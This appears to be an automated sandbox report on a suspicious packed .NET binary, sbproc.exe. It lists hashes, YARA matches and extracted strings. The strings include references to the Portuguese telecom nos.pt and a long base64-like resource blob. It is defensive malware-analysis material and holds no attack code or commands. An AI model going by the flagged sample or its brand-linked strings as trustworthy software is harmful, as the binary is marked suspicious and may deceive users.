Report #7908 check_circle

Binary
DLL
False cancel
Size
248.55KB
trid
61.7% Win64 Executable
14.7% Win32 Dynamic Link Library
10.0% Win32 Executable
4.5% OS/2 Executable
4.4% Generic Win/DOS Executable
type
PE
wordsize
32
Subsystem
Windows GUI
Hashes
md5
50c8d4a1457b26990b63796108afe7eb
sha1
fd2c81a2ff5e1da6421fb45b639381f84b7db0e6
crc32
0xa1b63f07
sha224
d64eda1ab5d69f2bc9bd52b3352d76a2891c88babc0b46be9bcaa0c1
sha256
0a11ceaa5a2bd3670357a261460dde1158e8d8c46faf3d94e941099bfab7ffc4
sha384
c68324ca5db486d1b5a3c8b2c2af5b6b8c972502308ae460246706f6fa9fa9edc5b933f439be18a2b4246f94a85f8fca
sha512
349c60afc16b77cd0b2c1d36cb1ff1678640fd92b3aac4c9f3120ddff8a9f5f3aa6d152b4c73a5e58284a9f53d5bec2bcd4e8aab6c9c19f649892700c0a5bdff
ssdeep
6144:lL/rmbwMlVQ61Bci69CQMlQqiomFmU1ZpB:1qQaBc7IdQq2oqpB
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
NET_executable, contentis_base64, Microsoft_Visual_C_v70_Basic_NET, HasDigitalSignature, Microsoft_Visual_Studio_NET_additional, url, IP, IsNET_EXE, NETexecutableMicrosoft, Microsoft_Visual_C_Basic_NET, Microsoft_Visual_Studio_NET, IsPacked, HasOverlay, NET_executable_, domain, IsPE32, Microsoft_Visual_C_v70_Basic_NET_additional, IsWindowsGUI

Suspicious
True check_circle

Strings
List
http://www.google.com
sbproc.My
My.Computer
System.IO
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
sbproc.omeuprimeiro.Properties
sbproc.omeuterceiro.Properties
noreply@nos.pt
sbproc.omeusegundo.Properties
System.ComponentModel.Design
A(0.dm
omeuprimeiro.Properties.Properties.Resources
omeuterceiro.Properties.Properties.Resources
4System.Web.Services.Protocols.SoapHttpClientProtocol
sbproc.My.Resources
www.nos.pt1
www.nos.pt1
www.nos.pt1
sbproc.exe
sbproc.exe
sbproc.exe
15.4.27.16
15.4.27.16
15.4.27.16
15.4.27.16
remove_DocumentCompleted
10.0.0.0
8.0.0.0
4.0.0.0
omeusegundo.Properties.Properties.Resources
prox5I+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+zD4+Pj4OPjw+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Hj4+L54+vj46Pj5+fj4iPj58nj6+Pjo+Pr6+PiY+PjNyPr4+Oj4+Pj4+Kj4+K54+Hj46Pj5+fj4uPj4cnj4ePjo+Pr6+PjI+PjqePi4+Oj5+fn4+Nj4+NZ4+Lj46Pn6+vj4iPjo+Pj49wcI+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj49wcI+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj49weXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcHl5eXB5eXlwzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXB5eXlweXl5cM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1weXl5cHl5eXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcHl5eXB5eXlwzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXB5eXlweXl5cM3NzXB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnDNzc1weXl5cHl5eXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcHl5eXB5eXlwzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXB5eXlweXl5cM3NzXB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnDNzc1weXl5cHl5eXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcHl5eXB5eXlwzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXB5eXlweXl5cM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eY+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Lz4+Pj4+Pr4+Oj4+Pr4+Pj5+Pj4+ncHBwcHBwcHCPj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj49wcHBwcHBwcHBwcHCPj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+PcHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXDNzc1wzc3NcH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cH9gfnB/YH5wf2B+cM3NzXDNzc1weXl5cHl5eXB5eXlweXl5cM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXB5eXlweXl5cHl5eXB5eXlwzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcM3NzXDNzc1wzc3NcHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5cHl5eXB5eXlweXl5j4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pnw+Pj4+Pj6+Pjo+Pj8+Pj4+vj4+Pp4+Pj4+PDe/NIcvBysaPj4+P3mqtSOKfra8RhG+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+Pw6+PN+mPAMP1WTNjr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4/Dr4826431+nQ4jmY5TY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+LTY+EMXW1clQXT6gpcfDxjFziC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+GC4+Y9GT3bAGET5IGcXRjkFJiPw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ovw+Ok0+OZhiWD6xckTogtjBvj4+Pj4+Pj4+Pj4+Pj4+PqMF7J1D5a2jbAmd3kU0S4vccvBLvnBHRz96Km89NAbRZYhP3287LxoqMj4/rJ+BIjkyBj49MgY+P/NbH/4aPj4/pJ/3Tj4+PiYePjo+Pj46Pj93Lx8aCj4+PhZWFgsjB3waPj3Bwj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj3Bwj4+Pj4+Pj4+Pj4+Pj4+Pj4yMjIyMjIyMjIyMjIyMjIyMjo6Ojo6Ojo6Ojo6Ojo6MjI6Ojo6Ojo6Ojo6Ojo6OjIyOjo6Ojo6Ojo6Ojo6OjoyMjo2NjY2NjY2NjY2NjY6MjI6NjY2NjY2NjY2NjY2OjIyOjY2NjY2NjY2NjY2NjoyMjo2NjY2NjY2NjY2NjY6MjI6NjY2NjY2NjY2NjY2OjIyOjY2NjY2NjY2NjY2NjoyMjo2NjY2NjY2NjY2NjY6MjI6NjY2NjY2NjY2NjY2OjIyOjo6Ojo6Ojo6Ojo6OjoyMjIyMjIyMjIyMjIyMjIyMj4+Pj4+Pj4+Pj4+Pj4+Pj49wcHCPj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj495eXmPf2B+j83NzY+Pj4+Pj46Pj4+Oj4+Pj4+Pj4+Pj4+Oj4+Pj4+Ph4+Oj4+Pr4+Pj5+Pj4+ncHBwcHBwcHCPj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj49wcHBwcHBwcHBwcHCPj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+PjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjoyMjIyOjo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjIyMjI6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6MjIyMjo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjoyMjIyOjo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjIyMjI6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6MjIyMjo6NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2OjoyMjIyOjo2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY6OjIyMjI6OjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2Njo6MjIyMjo6NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2OjoyMjIyOjo2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY6OjIyMjI6OjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2Njo6MjIyMjo6NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2OjoyMjIyOjo2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY6OjIyMjI6OjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2Njo6MjIyMjo6NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2OjoyMjIyOjo2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY6OjIyMjI6OjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2Njo6MjIyMjo6NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2OjoyMjIyOjo2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY6OjIyMjI6OjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2Njo6MjIyMjo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjoyMjIyOjo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj3BwcI+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4